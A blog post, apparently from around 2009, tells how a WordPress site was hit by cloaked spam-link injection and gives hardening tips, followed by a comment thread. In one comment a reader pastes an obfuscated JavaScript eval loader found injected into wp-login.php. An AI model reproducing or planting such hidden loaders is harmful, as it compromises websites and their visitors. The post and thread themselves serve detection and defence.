Has Your WordPress Blog Been Hacked?

Share

If you own a WordPress blog, you may have been hacked, but what’s worse, you may not even know that you have been exploited.

This happened to me recently, and today I want to ensure that every WordPress reader not only knows how to detect this problem, but how to fix the problem & how to protect your site from future attacks.

Ok, here is the thing… like most marketers, my technical skills are not very good, but like most marketers, I have a lot of very useful contacts. So I contacted a good friend of mine (Paul from SEOidiot)

Paul takes up the story below:

What Happened To DeanHunt.com – By Paul

Here’s the technical side of what they did and what we did to get around it, plus a brief explanation of what I coded to try and give people the chance to check for themselves: -

WordPress uses calls to wp_head and wp_footer to allow plugins to alter the content being returned as the page loads, a good example of this working well would be the SEO Title Tags plugin. However this is the functionality that the spammers used to insert a whole raft of links into the footer.

This article [http://linux.byexamples.com/archives/397/wordpress-exploit-we-been-hit-by-hidden-spam-link-injection/] explains the technique for anyone who likes headaches, but in basic terms they are using compromised theme files or adding in new files to your compromised server which act on the wp_footer call to insert their links.

They have been even smarter than that though as they have cloaked the links, so if you pop over to your own hacked site and view the source code you wont see the inserted links. Only when Googlebot comes along are the links shown, which is obviously a bad thing as Google suddenly thinks you’re linking out to a bunch of parasite hosted pills sites and will give you a penalty or remove you as a result.

Note: Dean’s rankings were virtually wiped out in Google

The Solution

So how to solve this? On a dedicated box you can trawl through searching for the files known to be compromised but a simpler and easier method is to remove the wp_footer call from the footer.php file in your current theme.

There are very few plugins that do anything useful in the footer so this made sense for Dean. If it had been the WP_head that was inserting links we would have needed to get the host to find the dodgy files or perhaps to have moved to a clean install somewhere else.

Because it isn’t easy for people to detect when they have been hacked this way I wrote a little tool to show people what their Google cache thinks are links out from your page, you can find this free tool at http://www.seoidiot.co.uk/cachecheker/

Back to Dean….

So in a nutshell, your WordPress blog may have been hacked, and the usual checks won’t show anything wrong. You may only realise something is wrong once you have been booted out of Google.

I am happy to announce that my Google rankings returned within 4 days of the offending spam being removed, which just shows once more why Google are by far the king of the search world.

So how can you prevent this happening to your WordPress site?

Firstly, and perhaps most importantly, make sure your WordPress is up to date. If you remain with the latest version at all times, you stand a much better chance of never having these issues.

For the more technically minded amongst you, i got some great tips from Matt Cutts, and this post I hope that considering the circumstances, Matt won’t mind me posting his tips below:

  1. Secure your /wp-admin/ directory. What I’ve done is lock down /wp-admin/ so that only certain IP addresses can access that directory. I use an .htaccess file, which you can place directly at /wp-admin/.htaccess . This is what mine looks like:

    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName “Access Control”
    AuthType Basic
    order deny,allow
    deny from all
    # whitelist home IP address
    allow from 64.233.169.99
    # whitelist work IP address
    allow from 69.147.114.210
    allow from 199.239.136.200
    # IP while in Kentucky; delete when back
    allow from 128.163.2.27

    I’ve changed the IP addresses, but otherwise that’s what I use. This file says that the IP address 64.233.169.99 (and the other IP addresses that I’ve whitelisted) are allowed to access /wp-admin/, but all other IP addresses are denied access. Has this saved me from being hacked before? Yes.

  2. Make an empty wp-content/plugins/index.html file. Otherwise you leak information on which plug-ins you run. If someone wanted to hack your blog, they might be able to do it by discovering that you run an out-of-date plugin on your blog and then they could exploit that.
  3. Subscribe to the WordPress Development blog at http://wordpress.org/development/feed/ . When WordPress patches a security hole or releases a new version, they announce it on that blog. If you see a security patch released, you need to upgrade or apply the patch. You leave yourself open to being hacked if you don’t upgrade.

And here’s a bonus tip: in the header.php file for your theme, you might want to check for a line like

” />

I’d just go ahead and delete that line or at least the bloginfo(’version’). If you’re running an older version of WordPress, anyone can view source to see what attacks might work against your blog.

Credit to Matt, Reuben and my buddy ShoeMoney I also got a lot of assistance from David Geere from the awesome EatingBritain. Oh, and David Naylor was incredibly helpful as well. Thanks David.

What’s Next For My WordPress Site’s Security?

Myself and Dave are looking to do a fresh install of WordPress, and we will also be looking into any plugins that can further assist us.

If you have any advice or tips based on the above, please leave them in the comments box. Also, send this post to any friends who have a WordPress site, I would hate for them to go through the hell that I had to suffer.

A wise man once told me: “what doesn’t kill you, only makes you stronger”, together we can ensure we are all strong enough to avoid this sort of issue in future.

Dean

  • http://www.NathanGilder.com Nathan Gilder

    Thanks for the tool, Paul – look at fixing the posted link though. Checked a few of my blogs and they’re looking okay for now.

    Dean, thanks for getting the word out. I’m digging the article.

    Current score: 0
  • http://www.connexted.com/blog Craig Dewe

    Thanks for the post and detailed explanation Dean… and glad to hear you’ve got it sorted!

    *runs off to check his blogs*

    Current score: 0
  • http://deanhunt.com Dean Hunt

    Link fixed, thanks Nathan.

    make sure you all use the free tool to check your sites.

    Current score: 0
  • http://www.steven-sanders.com Steven-Sanders

    There are alot more things you can do as well with security, and an easier way to not display the directory structure for folders that do not contain and index file.

    Vist my site for more info:

    http://www.steven-sanders.com/establishing-a-sense-of-security-on-your-blog/

    Current score: 0
  • http://none Jo

    hi there,
    I just wonder, inside cpanel there is a feature called “Index Manager”, i found that it’s very useful, we can set “No indexing” for those folders that we don’t want google index it.

    what do you think ?

    Current score: 0
  • http://deanhunt.com Dean Hunt

    Jo,

    Yes, that would help… I think Steven mentions something similar in his post (see above).

    Dean

    Current score: 0
  • http://www.itslingerieparadise.com Sandrine

    Thanks for sharing this with us Dean! I’ll run to my blog right away to make sure it’s OK and will tag your post on Stumble Upon too.

    Current score: 0
  • http://deanhunt.com Dean Hunt

    Many thanks,

    Joel Commm just mentioned it on his Facebook profile, and it is buzzing around Twitter as well.

    Dean

    Current score: 0
  • http://teamloxly,.com Deborah a.k.a. Loxly

    I use the Exploit Scanner plugin for WordPress found here:

    http://ocaoimh.ie/exploit-scanner/

    I was hacked in a way that they were able to insert invisible links into the last post made. They didn’t add them to any other posts, just the last one, and it included iframes that loaded malware. I had sites that didn’t just get penalized by Google, but that Google BLOCKED users completely from because they were dangerous.

    I did a clean install on all the blogs affected, then installed this plugin and run it regularly.

    Current score: 0
  • http://karmickmarketing.com Robert Fowler

    Thanks for sharing your story and the tool Dean. I also sent out a tweet on twitter referencing this post.

    You need to find new hamsters, or better crack, I reckon :)

    Current score: 0
  • http://deanhunt.com Dean Hunt

    Thanks Rob,

    You are a gent. We gotta play some golf some time.

    Dean

    Current score: 0
  • http://blogstorm.co.uk Patrick Altoft

    How about my Google Alerts solution?
    http://www.blogstorm.co.uk/how-to-use-google-alerts-to-find-out-if-your-site-gets-hacked/

    Current score: 0
  • http://deanhunt.com Dean Hunt

    Patrick,

    Interesting theory.

    My concern would be the terms used were quite niche pills, so you would need a list of 50-100 of the main ones, and inputting all of that would be time consuming.

    That said, I am sure someone can create a script to automate it.

    Dean

    Current score: 0
  • http://www.axethem.com Axethem

    There is nothing worse than showing up to your website and seeing a bunch of links to some spam site.

    Current score: 0
  • http://deanhunt.com Dean Hunt

    Very true Axethem.

    Unfortunately these were not even visibile links.

    Dean

    Current score: 0
  • http://robertdobes.com Robert

    Hi Dean,

    this is exactly what happened to me several months ago. The thing was there were no links visible on the site but after seeing my PR suddenly drop from 4 to 0 I checked the code source and there it was. Bunch of links to crappy sites. I was able to fix the problem and now I check everything on regular basis.
    Thanks for the tool and info, it really helps.

    By the way how did you manage to get your PR back to 5 so quickly? My site has never recovered and remains PR 0.

    Current score: 0
  • http://Blogi360.com @CoachDeb

    or – instead of doing all of the above…
    you just get yourself on a more advanced blogging platform http://BLOGi360.com

    Most people don’t realize WordPress is one of the most hackable blogging platforms out there.

    Security is of utmost importance if information on your blog supports your business.

    TX 4 sharing this.
    I’ll go retweet now…

    Current score: 0
  • http://www.AskLindaPTaylor.com Linda P Taylor

    This happened to me!!! My site was hacked and was eventually blocked by Google as “evil”. Even moving it to another web address did not help. I finally moved to Typepad and am paying a fee to keep these evil doers out of my creations! Wished I had seen this blog 3 months ago!

    Pay attention everyone on WordPress!!!

    Linda P. Taylor
    http://www.LindaPTaylor.com
    Blog: http://www.AskLindaPTaylor.com

    Current score: 0
  • http://congressratings.com/ Marc Beharry

    Thanks a bunch for this dude, i know how you feel. it has happened to me several times now :(

    Current score: 0
  • Simon

    I know this may not be the correct forum for this, but can anyone help? I followed the .htaccess route above, replacing the ip with the one shown for me at http://www.whatismyip.com, and it locks me out completely. I have to use FTP to delete the file.

    Am I missing something? Any ideas?

    Current score: 0
  • http://centurycafe.com Johnny T

    Nice tips, particularly about the .htacess file in the wp-admin directory. Cheers

    Current score: 0
  • Simon

    Sorry – never mind! I copied and pasted from above, but it has “ rather than ”

    All set now.

    Current score: 0
  • http://jeffmcneill.com Jeff McNeill

    A wise man? So you spoke with Nietzsche directly?

    Current score: 0
  • http://homemadesolar.net/concentrator/ chesty

    Where is the text, urls, etc, usually stored? (I mean the dodgy ones from the attacker) In the db or in one of the files?

    If the text is stored in a file, a regular cron job to grep for keywords might be the go, otherwise if it’s in the db, it’s a little more work, but a regular db search would be handy.

    I’m interested in developing something i can run on my server automagically, rather than manually checking.

    Current score: 0
  • http://www.theadsenseidiot.com The Adsense Idiot

    I discovered yesterday when logging into wp-login that someone had hacked several of my WP blogs. These sites are all running the latest version of wordpress.

    The hackers have somehow put a line of code into wp-login.php (see below)

    !function tzhrbn15(p) {var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,37,0,36,5,43,54,33,1,62,0,0,0,0,0,0,25,17,21,41,51
    ,52,49,40,46,53,30,4,31,29,35,56,27,38,45,44,47,24,32,10,34,58,3,0,0,0,0,18,0,50,7,2,14,12,19,22,
    23,13,11,59,15,6,48,61,8,39,57,28,20,60,26,55,42,16,9);for(i=Math.ceil(h/k);i>0;i–){c=”;for(s=Math.min(h,k);s>0;s–,h–){{j|=(t[p.charCodeAt(z++)-48])=8;d-=2}else{d=6}}}eval(c);}}tzhrbn15(‘@LenWbs626R6l5o6Ml@XxbenjqU1WbsDPlua25iV@DoFvTS7zW
    rFpDoDZTSN20unjlrDjNuqiwSNMDMDfaGFv5RwtmUV@9SaWLS6bben2JenpbsVvbU3zgOOl5RF2aMnPZSa
    md9DvPeVs0enWbunmJp7vJr1Mar74QODjNuqiwsX4QpNdQoFW5RFfx@qgYGFjLsam5o3L9CQd6R6hjuafa
    GabwRwc0uItcsn2TeNyW@VbNewlluayQO7′)

    Is this the same hack ?

    Thanks

    Current score: 0
  • http://deanhunt.com Dean Hunt

    Adsense Idiot

    I checked my wp-login.php, and I couldn’t find anything wrong with it.

    Current score: 0
  • http://www.theadsenseidiot.com The Adsense Idiot

    Thanks Dean,

    I also found this malicious script in my theme folder in header.php and footer.php

    Thanks for your reply

    Current score: 0
  • http://www.hackerforums.org Hacker Forums

    Most all blog hacks are from people not upgrading their blog software.

    If you don’t make a ton of changes, just backup your template one time, then create or download a script to email you a database dumb every couple days.

    http://www.hackerforums.org

    Current score: 0
  • http://www.ladyboyspattaya.com Internationalhardman

    My mates wordpress blog got hacked a while ago… it just redirects to some russian search engine now. Dunno how to fix it.

    Current score: 0
  • http://wiifitforsale.weebly.com awii9667

    In different Blogs , hacking can be done .Beware of this while writing your Blogs

    Current score: 0
  • http://www.unihacker.com UNiHacker

    A few tips to help bloggers stay hack free.

    #1 Backup your database once a week, or get a script to email it to you automatically.

    #2 Keep your blog software up-to-date.

    #3 Use stronger password, 2 uppercase, 2 lowercase, 2 numbers, 2 special characters should do it.

    Spending a few minutes a week doing this can save a lot of trouble from hackers in the long run.

    Hacker Forums

    Current score: 0
  • pnda

    Well guys , Thanks for your good information.I have come accross similar situation .I was searching the web to get some ideas finally find the following link which also has three good articles on malware problem , scanning and security …

    http://www.itoneworldsystem.com/blog/2009/01/29/how-to-scan-blogweb-site-for-malicious-codes/

    Current score: 0
  • cat

    Thanks for this post – I just checked all my WP sites using the tool you linked to, and a couple of my old WP blogs which I haven’t touched in ages do indeed have dody footer links. One of them is even displaying pharma-related Adsense ads! I will be more diligent about keeping all my WP sites updated from now on.

    Current score: 0
  • http://www.seo-check.dk Steen Öhman

    Very interesting post. Run 4-5 wordpress sites/blogs and allways try to update my system – but still some new and usefull tips here.

    I really like wordpress, but if so many people use a product – then it attracts the hackers.

    Steen Öhman
    Öhman Research – online marketing
    Denmark

    Current score: 0
  • http://www.allaboutauto.us mssmotorrd

    It’s the first time I commented here and I must say you share us genuine, and quality information for bloggers! Good job.
    p.s. You have a very good template for your blog. Where did you find it?

    Current score: 0
  • http://www.whoismicheleprice.com Michele Price

    Sounds great, Dean didn’t you say at beginning of post you are not a techy. Me neither so all that does not make any sense to me.

    Here is what I would have found helpful, a video (which is one of your favorite mediums)of how to do what he explained in text.

    I am still saying to myself HUH? Intellectually get you need to make changes-the process not landing for me.

    What if you have mobile wifi and travel and need to be able to access your worpress doesn’t that mean you will have a different IP everytime you log in? So got more quesitons ;) ))
    .-= Michele Price´s last blog ..What�s Your Networking Quotient-Thom Singer-Breakthrough Business Strategies Radio =-.

    Current score: 0
  • http://alcoholrehab.com Wade

    Well I guess this just stresses why everyone needs to continually make sure all of there pug in and softward is up to date.

    Current score: 0
  • http://xbox360fixx.allnewstreams.com Xbox 360 Red Ring Of Death Fix

    hey I actually have been following your site for a while and merely needed to congratulate you on the quality of your articles. great work

    Current score: 0
  • http://www.gettingfitkeepingfit.com How to Lose Weight

    Hey how are you. I found your blog through Google and I just wanted to say that I think your writing is simply stunning! Thanks again for providing this content for free.

    Regards!

    Check out my blog at How to lose weight fast

    Current score: 0
  • http://www.techdivision.com TechDivision

    Thanks for the very useful blogpost. We had the same problem with our blog and it wasn´t easy to find the reason for our loss in google rankings. This is a really bad… Hopefully the ranking will return after removing the inserted links!

    Current score: 0
  • Lenore

    I came here because someone has hacked my site and is placing spam on it. My Leave a Comment section was the same as the one on this site and I was getting a lot of spam so I changed it so that you have to login to post. However, someone is still posting spam without logging in. I see this site has the same problem, the comment “How to Lose Weight,” appears to be from the same spammer. Anyone know how to block this?

    Current score: 0
  • http://www.caremorstairlifts.co.uk Karen Hird

    I am at a loss to why my visitors have dropped off certain keywords where i still rank number 1 for. Where have my visitors gone? I have changed my site to a wordpress site from Joomla and have risen in rankings and my blogs seem to be ranking well but 6th on the first page of Google UK for my main keywords but traffic has dropped.

    Take for example my phrase “stairlifts for the elderly” i get no traffic now and on my old site i was in the same position and i got 134 vistors a month before but nothing has changed in rankings i would say i have done more blogs with different versions of the key word stairlift stair lifts for the elderly all near the top and nothing. What is going on?

    Current score: 0
  • http://www.deandreateam.com/114518-Chandler-AZ-RESCity.aspx Chandler Homes for Sale

    Enjoyed reading

    Current score: 0
  • http://www.gossipchips.com facebook poker chips

    This is a really good site post, im delighted I came across it. Ill be back down the track to check out other posts that

    Current score: 0
  • http://ilek.pl/sitemap.php apteka internetowa gdańsk

    Here you are!

    Current score: 0
  • http://donovanlinds26.tumblr.com/ mbox 2 pro

    Check out your program code or something. There’s any browser incompatibility along with your website.

    Current score: 0
  • http://www.blip.tv/file/4220812 cdj 800 used

    Will be great to learn where My wife and i are able obtain it.

    Current score: 0
  • http://www.trade2public.co.uk/glass_safety_k_low_e.html window glass

    Hi there Will it be ok if I go somewhat off subject? Now i’m trying to access the blog site on my brand-new ipad however it won’t display correctly, do you possess any kind of tips? Shall I attempt to find an up grade for my software or some thing? With thanks for the support.

    Current score: 0
  • http://www.1s3y5j2l4.com Karolyn Cochran

    BestAntivirusSoftware.co.nz is New Zealand’s No.1 Absolutely free

    Current score: 0
  • http://hauntjaunts.net/blog Courtney Mroch

    What do I do if my blog was hacked? I can’t login to look at any plugins or anything. Any suggestions/advice of where to turn?

    Current score: 0